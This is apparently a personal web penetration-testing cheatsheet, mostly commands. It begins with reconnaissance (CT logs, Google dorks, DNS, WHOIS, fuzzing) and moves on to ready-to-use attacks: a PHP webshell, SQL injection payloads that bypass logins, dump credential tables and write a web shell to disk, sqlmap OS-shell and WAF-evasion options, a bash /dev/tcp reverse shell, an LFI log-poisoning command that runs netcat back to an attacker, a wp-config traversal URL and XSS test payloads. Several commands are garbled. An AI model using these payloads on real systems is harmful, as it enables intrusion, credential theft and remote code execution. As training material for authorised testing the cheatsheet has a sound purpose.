Web pentest cheatsheet
Information Gathering
Consider utilizing web spiders such as ParseHub, SpiderFoot, and Web Data Extractor for extracting data from websites
Certificate Transparency (CT) Logs
Certificate Transparency (CT) logs offer a treasure trove of subdomain information for passive reconnaissance. These publicly accessible logs record SSL/TLS certificates issued for domains and their subdomains, serving as a security measure to prevent fraudulent certificates. For reconnaissance, they offer a window into potentially overlooked subdomains.
The crt.sh
website provides a searchable interface for CT logs. To efficiently extract subdomains using crt.sh
within your terminal, you can use a command like this:
curl -s "https://crt.sh/?q=%25.example.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
# jq -r '.[] | select(.name_value | contains("dev")) | .name_value': This part filters the JSON results, selecting only entries where the name_value field (which contains the domain or subdomain) includes the string "dev". The -r flag tells jq to output raw strings.
curl -s "https://crt.sh/?q=facebook.com&output=json" | jq -r '.[] | select(.name_value | contains("dev")) | .name_value' | sort -u
This command fetches JSON-formatted data from crt.sh
for example.com
(the %
is a wildcard), extracts domain names using jq
, removes any wildcard prefixes (*.
) with sed
, and finally sorts and deduplicates the results.
https://search.censys.io/ is also a great resource for internet connecte devices, advanced filtering by domain, IP or certificate attributes.
Web Crawling
Web crawling is the automated exploration of a website's structure. A web crawler, or spider, systematically navigates through web pages by following links, mimicking a user's browsing behavior. This process maps out the site's architecture and gathers valuable information embedded within the pages.
A crucial file that guides web crawlers is robots.txt
. This file resides in a website's root directory and dictates which areas are off-limits for crawlers. Analyzing robots.txt
can reveal hidden directories or sensitive areas that the website owner doesn't want to be indexed by search engines.
Scrapy
is a powerful and efficient Python framework for large-scale web crawling and scraping projects. It provides a structured approach to defining crawling rules, extracting data, and handling various output formats.
Here's a basic Scrapy spider example to extract links from example.com
:
Code: python
#Install Scrapy
pip3 install scrapy --break-system-packages
#Install ReconSpider and unzip it
wget https://academy.hackthebox.com/storage/modules/279/ ; unzip ReconSpider.zip
#RunSpider, this will run the spider on the give website and save the results to results.json
python3 ReconSpider.py <URL>
#Generate a spider for given URL and it will generate the spider containing the filename you specified
scrapy genspider [options] <name> <domain>
#RunSpider
#Generatespider using a predefined template
scrapy genspider -t crawl crawlinlane http://example.com
scrapy runspider <GeneratedSpiderFileName>
#SpiderExampleGeneratedWith Scrapy
import scrapy
class ExampleSpider(scrapy.Spider):
name = "example"
start_urls = ['http://example.com/']
def parse(self, response):
for link in response.css('a::attr(href)').getall():
if any(link.endswith(ext) for ext in self.interesting_extensions):
yield {"file": link}
elif not link.startswith("#") and not link.startswith("mailto:"):
yield response.follow(link, callback=self.parse)
After running the Scrapy spider, you'll have a file containing scraped data (e.g., example_data.json
). You can analyze these results using standard command-line tools. For instance, to extract all links:
Code: bash
jq -r '.[] | select(.file != null) | .file' example_data.json | sort -u
This command uses jq
to extract links, awk
to isolate file extensions, sort
to order them, and uniq -c
to count their occurrences. By scrutinizing the extracted data, you can identify patterns, anomalies, or sensitive files that might be of interest for further investigation.
Search Engine Discovery
Leveraging search engines for reconnaissance involves utilizing their vast indexes of web content to uncover information about your target. This passive technique, often referred to as Open Source Intelligence (OSINT) gathering, can yield valuable insights without directly interacting with the target's systems.
By employing advanced search operators and specialized queries known as "Google Dorks," you can pinpoint specific information buried within search results. Here's a table of some useful search operators for web reconnaissance:
site:
Limits results to a specific website or domain.
site:example.com
Find all publicly accessible pages on example.com.
inurl:
Finds pages with a specific term in the URL.
inurl:login
Search for login pages on any website.
filetype:
Searches for files of a particular type.
filetype:pdf
Find downloadable PDF documents.
intitle:
Finds pages with a specific term in the title.
intitle:"confidential report"
Look for documents titled "confidential report" or similar variations.
intext:
or inbody:
Searches for a term within the body text of pages.
intext:"password reset"
Identify webpages containing the term “password reset”.
cache:
Displays the cached version of a webpage (if available).
cache:example.com
View the cached version of example.com to see its previous content.
link:
Finds pages that link to a specific webpage.
link:example.com
Identify websites linking to example.com.
related:
Finds websites related to a specific webpage.
related:example.com
Discover websites similar to example.com.
info:
Provides a summary of information about a webpage.
info:example.com
Get basic details about example.com, such as its title and description.
define:
Provides definitions of a word or phrase.
define:phishing
Get a definition of "phishing" from various sources.
numrange:
Searches for numbers within a specific range.
site:example.com numrange:1000-2000
Find pages on example.com containing numbers between 1000 and 2000.
allintext:
Finds pages containing all specified words in the body text.
allintext:admin password reset
Search for pages containing both "admin" and "password reset" in the body text.
allinurl:
Finds pages containing all specified words in the URL.
allinurl:admin panel
Look for pages with "admin" and "panel" in the URL.
allintitle:
Finds pages containing all specified words in the title.
allintitle:confidential report 2023
Search for pages with "confidential," "report," and "2023" in the title.
AND
Narrows results by requiring all terms to be present.
site:example.com AND (inurl:admin OR inurl:login)
Find admin or login pages specifically on example.com.
OR
Broadens results by including pages with any of the terms.
"linux" OR "ubuntu" OR "debian"
Search for webpages mentioning Linux, Ubuntu, or Debian.
NOT
Excludes results containing the specified term.
site:bank.com NOT inurl:login
Find pages on bank.com excluding login pages.
*
(wildcard)
Represents any character or word.
site:socialnetwork.com filetype:pdf user* manual
Search for user manuals (user guide, user handbook) in PDF format on socialnetwork.com.
..
(range search)
Finds results within a specified numerical range.
site:ecommerce.com "price" 100..500
Look for products priced between 100 and 500 on an e-commerce website.
" "
(quotation marks)
Searches for exact phrases.
"information security policy"
Find documents mentioning the exact phrase "information security policy".
-
(minus sign)
Excludes terms from the search results.
site:news.com -inurl:sports
Search for news articles on news.com excluding sports-related content.
Google Dorking
Google Dorking, also known as Google Hacking, is a technique that leverages the power of search operators to uncover sensitive information, security vulnerabilities, or hidden content on websites, using Google Search.
Here are some common examples of Google Dorks, for more examples, refer to the Google Hacking Database:
Finding Login Pages:
site:example.com inurl:login
site:example.com (inurl:login OR inurl:admin)
Identifying Exposed Files:
site:example.com filetype:pdf
site:example.com (filetype:xls OR filetype:docx)
Uncovering Configuration Files:
site:example.com inurl:config.php
site:example.com (ext:conf OR ext:cnf)
(searches for extensions commonly used for configuration files)
Locating Database Backups:
site:example.com inurl:backup
site:example.com filetype:sql
By creatively combining these operators and crafting targeted queries, you can uncover sensitive documents, exposed directories, login pages, and other valuable information that may aid in your reconnaissance efforts.
There is a good resource that I found allowing you to generate interesting queries for Github, Shodan and Google:
Web Archive
The wayback mahcine is a digital archive of the World Wide Web. It allows the users to go back in time and view snapshots of a website. The Wayback Machine operates by using web crawlers to capture snapshots of websites at regular intervals automatically. These crawlers navigate through the web, following links and indexing pages, much like how search engine crawlers work. However, instead of simply indexing the information for search purposes, the Wayback Machine stores the entire content of the pages, including HTML, CSS, JavaScript, images, and other resources. Factors that influence this frequency include the website's popularity, its rate of change, and the resources available to the Internet Archive.
Automated reconnaissance tools
These frameworks aim to provide a complete suite of tools for web reconnaissance:
FinalRecon: A Python-based reconnaissance tool offering a range of modules for different tasks like SSL certificate checking, Whois information gathering, header analysis, and crawling. Its modular structure enables easy customisation for specific needs.
Recon-ng: A powerful framework written in Python that offers a modular structure with various modules for different reconnaissance tasks. It can perform DNS enumeration, subdomain discovery, port scanning, web crawling, and even exploit known vulnerabilities.
theHarvester: Specifically designed for gathering email addresses, subdomains, hosts, employee names, open ports, and banners from different public sources like search engines, PGP key servers, and the SHODAN database. It is a command-line tool written in Python.
SpiderFoot: An open-source intelligence automation tool that integrates with various data sources to collect information about a target, including IP addresses, domain names, email addresses, and social media profiles. It can perform DNS lookups, web crawling, port scanning, and more.
OSINT Framework: A collection of various tools and resources for open-source intelligence gathering. It covers a wide range of information sources, including social media, search engines, public records, and more.
#FinalRecon
git clone https://github.com/thewhiteh4t/FinalRecon.git
cd FinalRecon
pip3 install -r requirements.txt
chmod +x ./finalrecon.py
./finalrecon.py --help
./finalrecon.py --url <PUTUrlHere> --sslinfo
./finalrecon.py --headers --whois --url <URL>
Perform Web Security Reconnaissance with Skipfish
skipfish -o /home/attacker/test -S /usr/share/skipfish/dictionaries/complete.wl http://[IP_Address]:8080
Use HTTPRECON for general web reconnaissance. An example for tool execution could be:
httprecon http://targetsite.com
Subdomain Guessing
To use dnsenum
for subdomain brute-forcing, you'll typically provide it with the target domain and a wordlist containing potential subdomain names. The tool will then systematically query the DNS server for each potential subdomain and report any that exist.
-r
: This option enables recursive subdomain brute-forcing, meaning that if dnsenum
finds a subdomain, it will then try to enumerate subdomains of that subdomain.
dnsenum example.com -f subdomains.txt
dnsenum --enum inlanefreight.com -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -r
DNS
The Domain Name System (DNS) functions as the internet's GPS, translating user-friendly domain names into the numerical IP addresses computers use to communicate. Like GPS converting a destination's name into coordinates, DNS ensures your browser reaches the correct website by matching its name with its IP address. This eliminates memorizing complex numerical addresses, making web navigation seamless and efficient.
The dig
command allows you to query DNS servers directly, retrieving specific information about domain names. For instance, if you want to find the IP address associated with example.com
, you can execute the following command:
dig example.com A
dig -x example.com #get the PTR record for example.com
dig example.com MX
dig exmaple NS
dig example AAAA
dig axfr @nsztm1.digi.ninja zonetransfer.me #request full zone transfer (axfr) from the dns server responsible for zonetransfer.me
This command instructs dig
to query the DNS for the A
record (which maps a hostname to an IPv4 address) of example.com
. The output will typically include the requested IP address, along with additional details about the query and response. By mastering the dig
command and understanding the various DNS record types, you gain the ability to extract valuable information about a target's infrastructure and online presence.
WHOIS
Before using the whois
command, you'll need to ensure it's installed on your Linux system. It's a utility available through linux package managers, and if it's not installed, it can be installed simply with
Utilising WHOIS
sudo apt update
sudo apt install whois -y
The simplest way to access WHOIS data is through the whois
command-line tool. Let's perform a WHOIS lookup on facebook.com
:
Utilising WHOIS
whois facebook.com
Domain Name: FACEBOOK.COM
Registry Domain ID: 2320948_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.registrarsafe.com
Registrar URL: http://www.registrarsafe.com
Updated Date: 2024-04-24T19:06:12Z
Creation Date: 1997-03-29T05:00:00Z
Registry Expiry Date: 2033-03-30T04:00:00Z
Registrar: RegistrarSafe, LLC
Registrar IANA ID: 3237
Registrar Abuse Contact Email: abusecomplaints@registrarsafe.com
Registrar Abuse Contact Phone: +1-650-308-7004
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
Name Server: A.NS.FACEBOOK.COM
Name Server: B.NS.FACEBOOK.COM
Name Server: C.NS.FACEBOOK.COM
Name Server: D.NS.FACEBOOK.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2024-06-01T11:24:10Z <<<
[...]
Registry Registrant ID:
Registrant Name: Domain Admin
Registrant Organization: Meta Platforms, Inc.
[...]
The WHOIS output for facebook.com
reveals several key details:
Domain Registration
:Registrar
: RegistrarSafe, LLCCreation Date
: 1997-03-29Expiry Date
: 2033-03-30
These details indicate that the domain is registered with RegistrarSafe, LLC, and has been active for a considerable period, suggesting its legitimacy and established online presence. The distant expiry date further reinforces its longevity.
Domain Owner
:Registrant/Admin/Tech Organization
: Meta Platforms, Inc.Registrant/Admin/Tech Contact
: Domain Admin
This information identifies Meta Platforms, Inc. as the organization behind
facebook.com
, and "Domain Admin" as the point of contact for domain-related matters. This is consistent with the expectation that Facebook, a prominent social media platform, is owned by Meta Platforms, Inc.Domain Status
:clientDeleteProhibited
,clientTransferProhibited
,clientUpdateProhibited
,serverDeleteProhibited
,serverTransferProhibited
, andserverUpdateProhibited
These statuses indicate that the domain is protected against unauthorized changes, transfers, or deletions on both the client and server sides. This highlights a strong emphasis on security and control over the domain.
Name Servers
:A.NS.FACEBOOK.COM
,B.NS.FACEBOOK.COM
,C.NS.FACEBOOK.COM
,D.NS.FACEBOOK.COM
These name servers are all within the
facebook.com
domain, suggesting that Meta Platforms, Inc. manages its DNS infrastructure. It is common practice for large organizations to maintain control and reliability over their DNS resolution.
Overall, the WHOIS output for facebook.com
aligns with expectations for a well-established and secure domain owned by a large organization like Meta Platforms, Inc.
While the WHOIS record provides contact information for domain-related issues, it might not be directly helpful in identifying individual employees or specific vulnerabilities. This highlights the need to combine WHOIS data with other reconnaissance techniques to understand the target's digital footprint comprehensively.
Zone Transfers
DNS zone transfers, also known as AXFR (Asynchronous Full Transfer) requests, offer a potential goldmine of information for web reconnaissance. A zone transfer is a mechanism for replicating DNS data across servers. When a zone transfer is successful, it provides a complete copy of the DNS zone file, which contains a wealth of details about the target domain.
To attempt a zone transfer, you can use the dig
command with the axfr
(full zone transfer) option. For example, to request a zone transfer from the DNS server ns1.example.com
for the domain example.com
, you would execute:
Code: bash
dig @ns1.example.com example.com axfr
However, zone transfers are not always permitted. Many DNS servers are configured to restrict zone transfers to authorized secondary servers only. Misconfigured servers, though, may allow zone transfers from any source, inadvertently exposing sensitive information.
Guess Virtualhosts
Virtual hosting is a technique that allows multiple websites to share a single IP address. Each website is associated with a unique hostname, which is used to direct incoming requests to the correct site. This can be a cost-effective way for organizations to host multiple websites on a single server, but it can also create a challenge for web reconnaissance.
Since multiple websites share the same IP address, simply scanning the IP won't reveal all the hosted sites. You need a tool that can test different hostnames against the IP address to see which ones respond.
Gobuster is a versatile tool that can be used for various types of brute-forcing, including virtual host discovery. Its
vhost
mode is designed to enumerate virtual hosts by sending requests to the target IP address with different hostnames. If a virtual host is configured for a specific hostname, Gobuster will receive a response from the web server.To use Gobuster to brute-force virtual hosts, you'll need a wordlist containing potential hostnames. Here's an example command:
#identify first the ipaddress and add it to your /etc/hosts file. -t to increase the nr of threads, append-domain only on newer versions)
gobuster vhost -u http://192.0.2.1 -w hostnames.txt --append-domain -t 200
gobuster vhost -u http://thetoppers.htb:PORT -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain
Guess Subdomains with Wfuzz
Use Wfuzz to replace "FUZZ" with words from your wordlist to identify subdomains:
sudo wfuzz -c -f fuzzthetoppers.txt -Z -w /home/SecLists/Discovery/DNS/subdomains-top1million-5000.txt FUZZ.thetoppers.htb
Specify the
-x
option to filter on specific extensions:
wfuzz -c -w /usr/share/wordlists/wfuzz/general/common.txt -b "PHPSESSID=8v1ktin9mia013dhurccn4fae3; security=low" -u http://127.0.0.1:42001/vulnerabilities/fi/?page=../../hackable/flags/FUZZ.php --hl 82
Web Fuzzing and directory discovery
Fuzzing with ffuf
# Install ffuf
apt install ffuf -y
# Display ffuf help
ffuf -h
# Directory Fuzzing in silent mode to show only the results matching the code 200
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -s -c -mc 200
#Fuzz for the index file which can be fond in most websites to fuzz for the extention used by the webserver
ffuf -w /opt/useful/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://SERVER_IP:PORT/blog/indexFUZZ
#Multiple Fuzzing, for directories and for extentions
ffuf -w /opt/useful/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ_2 -w /opt/useful/seclists/Discovery/Web-Content/directory-list-1.0.txt:FUZZ_1 -u http://83.136.251.174:36820/blog/FUZZ_1FUZZ_2 -c -mc 200
#Recursive scanning to automatically scan newly identified directory with -recursion flag. Specify the recursion depth that you want with -recursion-depth NR. -v to print the URL and -e to fuzz for a specific extention
ffuf -w /opt/useful/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://83.136.251.174:36820/FUZZ -recursion -recursion-depth 1 -e .php -v
# Extension Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZ
# Page Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.php
# Recursive Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v
# Sub-domain Fuzzing
ffuf -w wordlist.txt:FUZZ -u https://FUZZ.example.com/
# VHost Fuzzing - with -fs you can filter out (remove) those with a specific content-size
ffuf -w /opt/useful/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://example.com:PORT/ -H 'Host: FUZZ.example.com' -fs xxx
# Parameter Fuzzing - GET
ffuf -w seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://admin.example.com:PORT/admin/admin.php?FUZZ=key -fs xxx
# Parameter Fuzzing - POST
ffuf -w wordlist.txt:FUZZ -u http://admin.example.com:PORT/admin/admin.php -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx
# Fuzzing with specified IDs
ffuf -w ids.txt:FUZZ -u http://admin.example.com:PORT/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx
Guess Directories Using Gobuster
Use Gobuster to guess directories and subdomains of a specific web application:
gobuster dir -u targetsite.com -w /path/wordlist.txt
Note: You can use wordlists located in
/usr/share/wordlists/*
.
Directory Enumeration with Nmap
Use Nmap to enumerate directories on a target website:
nmap -sV --script=http-enum [target_website]
You can also use Burpsuite intruder and Dirbuster to discover content on the webapplication
# Directory Brute Forcing using Gobuster
gobuster dir -u http://172.25.210.128 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
# Directory Brute Forcing with FFUF
ffuf -u http://172.25.20.6:5985/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt
These commands are utilized for discovering directories on a web server, detecting vulnerabilities such as ShellShock, and potentially exploiting these vulnerabilities to gain unauthorized access or execute commands on the server.
Uniscan for Footprinting
Footprint a website for web directory structure:
uniscan -u http://10.10.1.22:8080/CEH -q
Perform a dynamic scan to extract emails, backdoors, and external hosts:
uniscan -u http://10.10.1.22:8080/CEH -d
Wordpress enumeration
# Directory traversal on a vulnerable wordpress plugin. This approach uses the 'ebook-download' plugin to access sensitive files.
http://www.cpent.com/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
# Enumerate WordPress plugins on the given URL to identify potential vulnerabilities.
wpscan --url http://www.cpent.com --enumerate p
# Use the API token for authenticated scanning of WordPress plugins.
wpscan --url http://172.25.210.128 --api-token <API Token Here>
# msf module to enumerate logged on users on wordpress
Use auxiliary/scanner/http/wordpress_login_enum
# Perform brute force attack to crack WordPress password. Uses common passwords from a predefined list.
wpscan --url http://172.25.210.128 -U psychotic_animal -P /usr/share/seclists/Passwords/xa
Detect host mappings using:
nmap --script hostmap-bfk --script-args hostmap-bfk.prefix=hostmap-www.goodshopping.com
Detect web application firewalls:
nmap -p80 --script http-waf-detect www.goodshopping.com
Trace HTTP requests:
nmap --script http-trace -d www.goodshopping.com
Banner Grabbing
whatweb inlanefreight.com
# Extract headers with Curl to get info on used technology
curl -I inlanefreight.com
#The wafw00f scan on inlanefreight.com reveals that the website is protected by the Wordfence Web Application Firewall (WAF), developed by Defiant.
pip3 install git+https://github.com/EnableSecurity/wafw00f
wafw00f inlanefreight.com
# Nikto's fingerprinting capabilities provide insights into a website's technology stack.
nikto -h inlanefreight.com -Tuning b #-Tuning b flag tells Nikto to only run the Software Identification modules.
https://www.wappalyzer.com/ web extension can also be used to identify website technologies
https://builtwith.com/ is a Web technology profiler that provides detailed reports on a website's technology stack.
nc -vv www.moviescope.com 80
telnet www.moviescope.com 80
Webshells
#Create a php webshell
Cd b374k-masterphp -f index.php -- -o shell.php -s -b -z gzcompress -c 9
#Php webshell to execute cmd commands
<?php echo system($_POST['cmd']); ?>
SQL Injection Testing
SQLi Discovery
Before we start subverting the web application's logic and attempting to bypass the authentication, we first have to test whether the login form is vulnerable to SQL injection. To do that, we will try to add one of the below payloads after our username and see if it causes any errors or changes how the page behaves:
In some cases, we may have to use the URL encoded version of the payload. An example of this is when we put our payload directly in the URL 'i.e. HTTP GET request'.
'
%27
"
%22
#
%23
;
%3B
)
%29
MySQL
Command
Description
General
mysql -u root -h docker.hackthebox.eu -P 3306 -p
login to mysql database
SHOW DATABASES
List available databases
USE users
Switch to database
Tables
CREATE TABLE logins (id INT, ...)
Add a new table
SHOW TABLES
List available tables in current database
DESCRIBE logins
Show table properties and columns
INSERT INTO table_name VALUES (value_1,..)
Add values to table
INSERT INTO table_name(column2, ...) VALUES (column2_value, ..)
Add values to specific columns in a table
UPDATE table_name SET column1=newvalue1, ... WHERE <condition>
Update table values
Columns
SELECT * FROM table_name
Show all columns in a table
SELECT column1, column2 FROM table_name
Show specific columns in a table
DROP TABLE logins
Delete a table
ALTER TABLE logins ADD newColumn INT
Add new column
ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn
Rename column
ALTER TABLE logins MODIFY oldColumn DATE
Change column datatype
ALTER TABLE logins DROP oldColumn
Delete column
Output
SELECT * FROM logins ORDER BY column_1
Sort by column
SELECT * FROM logins ORDER BY column_1 DESC
Sort by column in descending order
SELECT * FROM logins ORDER BY column_1 DESC, id ASC
Sort by two-columns
SELECT * FROM logins LIMIT 2
Only show first two results
SELECT * FROM logins LIMIT 1, 2
Only show first two results starting from index 2
SELECT * FROM table_name WHERE <condition>
List results that meet a condition
SELECT * FROM logins WHERE username LIKE 'admin%'
List results where the name is similar to a given string
MySQL Operator Precedence
Division (
/
), Multiplication (*
), and Modulus (%
)Addition (
+
) and Subtraction (-
)Comparison (
=
,>
,<
,<=
,>=
,!=
,LIKE
)NOT (
!
)AND (
&&
)OR (
||
)
SQL Injection
Auth Bypass
admin' or '1'='1
Basic Auth Bypass
admin' or 1 = 1 -- -
admin')-- -
Basic Auth Bypass With comments
Union Injection
' order by 1-- -
Detect number of columns using order by
cn' UNION select 1,2,3-- -
Detect number of columns using Union injection
cn' UNION select 1,@@version,3,4-- -
Basic Union injection
UNION select username, 2, 3, 4 from passwords-- -
Union injection for 4 columns
DB Enumeration
SELECT @@version
Fingerprint MySQL with query output
SELECT SLEEP(5)
Fingerprint MySQL with no output
cn' UNION select 1,database(),2,3-- -
Current database name
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -
List all databases
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -
List all tables in a specific database
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -
List all columns in a specific table
cn' UNION select 1, username, password, 4 from dev.credentials-- -
Dump data from a table in another database
Privileges
cn' UNION SELECT 1, user(), 3, 4-- -
Find current user
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -
Find if user has admin privileges
cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -
Find if all user privileges
cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -
Find which directories can be accessed through MySQL
File Injection
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -
Read local file
select 'file written successfully!' into outfile '/var/www/html/proof.txt'
Write a string to a local file
cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -
Write a web shell into the base web directory
SQLMAP
- Use the following command to test a specific IP or URL for SQL injection vulnerabilities:
sqlmap -u IP_or_URL -r <reqFileContainingRequestBurpFile> # Test SQLi using a request file containing the necessary info, could be a request file that you export from burp
SQLMAP CheatSheet
sudo apt install sqlmap # Installation from Linux Distribution
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev # Manual installation from Linux/windows
python sqlmap.py # Running the SQLMAP
sqlmap -h # View the basic help menu
sqlmap -hh # View the advanced help menu
# Test for SQLi vulnerabilities
sqlmap -u "http://www.example.com/vuln.php?id=1" --batch # Run SQLMap without asking for user input
sqlmap 'http://www.example.com/' --data 'uid=1&name=test' # SQLMap with POST request
sqlmap 'http://www.example.com/' --data 'uid=1*&name=test' # POST request specifying an injection point with an asterisk
sqlmap -r req.txt # Passing an HTTP request file to SQLMap
sqlmap -u http://192.168.202.162/cat.php?id=1 -p id --proxy="http://localhost:8080" # Redirect traffic to your proxy MiTM
sqlmap -u http://192.168.202.162/cat.php?id=1 --union-cols=17 --union-from=users # FineTuning Union SQLI
sqlmap -u http:/... --cookie="PHPSESSID=j9c5bkd3oiaskl5ii7je5q2s0q" # Specifying a cookie header
sqlmap -u www.target.com --data='id=1' --method PUT # Specifying a PUT request
sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt # Store traffic to an output file
sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch # Specify verbosity level
sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -" # Specifying a prefix or suffix
sqlmap -u www.example.com/?id=1 -v 3 --level=5 --risk=3 # Specifying the level and risk
sqlmap -u http://192.168.202.162/cat.php?id=1 --technique=BEQSTU # Choose a specific SQLi technique B, E, Q, S, T, U
# Dump data
sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba # Basic DB enumeration
sqlmap -u "http://www.example.com/?id=1" --tables -D testdb # Table enumeration
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --start=2 --stop=3 # Extract only the 2de and stop and the 3de row
sqlmap -u "http://www.example.com/?id=1" --dump -D testdb #Dump the entire table
qlmap -u "http://www.example.com/?id=1" --dump-all --exclude-sysdbs # Dump all DB's except the sysdbs whichle are little of interest
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname # Table/row enumeration
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --dump-format=HTML # specify the export format you want for the dump
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'" # Conditional enumeration
sqlmap -u "http://www.example.com/?id=1" --schema # Database schema enumeration
sqlmap -u "http://www.example.com/?id=1" --search -T user # Searching for data
sqlmap -u "http://www.example.com/?id=1" --passwords --batch # All Password enumeration and cracking
--all --batch # Tip: The '--all' switch in combination with the '--batch' switch, will automa(g)ically do the whole enumeration process on the target itself, and provide the entire enumeration details.
sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba # Check for DBA privileges
#FileRead
sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd" # Reading a local file
#FileWrite
sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php" # Writing a file
#Spawing Shell
sqlmap -u "http://www.example.com/?id=1" --os-shell # Spawning an OS shell
SQLMAP - Webapp protections bypasses
# Anti-CSRF Token Bypass
sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"
# Unique Value Bypass
sqlmap -u "http://www.example.com/?id=1&rp=29125" --randomize=rp --batch -v 5 | grep URI
# Calculated Parameter Bypass
sqlmap -u "http://www.example.com/?id=1&h=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib; h=hashlib.md5(id).hexdigest()" --batch -v 5 | grep URI
# IP Address Concealing
--proxy (e.g. --proxy="socks4://177.39.187.70:33283")
--tor
# WAF bypass
--skip-waf
# User-agent Blacklisting Bypass
--random-agent
# Tamper Scripts
--list-tampers
--tamper=between,randomcase
# HTTP Param pollution
--chunked
SQLmap Tamper scripts
Tamper-Script
Description
0eunion
Replaces instances of UNION with e0UNION
base64encode
Base64-encodes all characters in a given payload
between
Replaces greater than operator (>
) with NOT BETWEEN 0 AND #
and equals operator (=
) with BETWEEN # AND #
commalesslimit
Replaces (MySQL) instances like LIMIT M, N
with LIMIT N OFFSET M
counterpart
equaltolike
Replaces all occurrences of operator equal (=
) with LIKE
counterpart
halfversionedmorekeywords
Adds (MySQL) versioned comment before each keyword
modsecurityversioned
Embraces complete query with (MySQL) versioned comment
modsecurityzeroversioned
Embraces complete query with (MySQL) zero-versioned comment
percentage
Adds a percentage sign (%
) in front of each character (e.g. SELECT -> %S%E%L%E%C%T)
plus2concat
Replaces plus operator (+
) with (MsSQL) function CONCAT() counterpart
randomcase
Replaces each keyword character with random case value (e.g. SELECT -> SEleCt)
space2comment
Replaces space character (
) with comments `/
space2dash
Replaces space character (
) with a dash comment (--
) followed by a random string and a new line ()
space2hash
Replaces (MySQL) instances of space character (
) with a pound character (#
) followed by a random string and a new line ()
space2mssqlblank
Replaces (MsSQL) instances of space character (
) with a random blank character from a valid set of alternate characters
space2plus
Replaces space character (
) with plus (+
)
space2randomblank
Replaces space character (
) with a random blank character from a valid set of alternate characters
symboliclogical
Replaces AND and OR logical operators with their symbolic counterparts (&&
and ||
)
versionedkeywords
Encloses each non-function keyword with (MySQL) versioned comment
versionedmorekeywords
Encloses each keyword with (MySQL) versioned comment
To create a more stable reverse shell, use the following payload:
bash -c "bash -i >& /dev/tcp/{your_IP}/443 0>&1"
Local File Include Vulnerability
Access Local Files via Local File Inclusion
Exploit local file inclusion vulnerabilities using direct HTTP requests:
http://unika.htb/index.php?page=../../../../../../../../../../windows/system32/drivers/etc/hosts
The inclusion occurs due to the
include()
function in PHP, where directory traversal allows unauthorized file access.
LFI to RCE example
# Execute a command using curl with a POST request, leveraging LFI for log poisoning and RCE
curl -X POST http://192.168.56.102/turing-bolo/bolo.php?bolo=/var/log/mail --data "cmd=nc 192.168.56.101 4444 -e / "cmd/bash"
# Set up a listener for incoming connections on port 4444 using netcat
nc -nlvp 4444
# Perform a GET request using curl
curl -X GET http://192.168.56.102/turing-bolo/bolo.php?bolo=/var/log/mail
Cross Site Scripting (XSS)
XSS vulnerabilities take advantage of a flaw in user input sanitization to "write" JavaScript code to the page and execute it on the client side, leading to several types of attacks.
#Simple XSS Test Payloads to easy-spot XSS vulns
<script>alert(window.origin)</script>
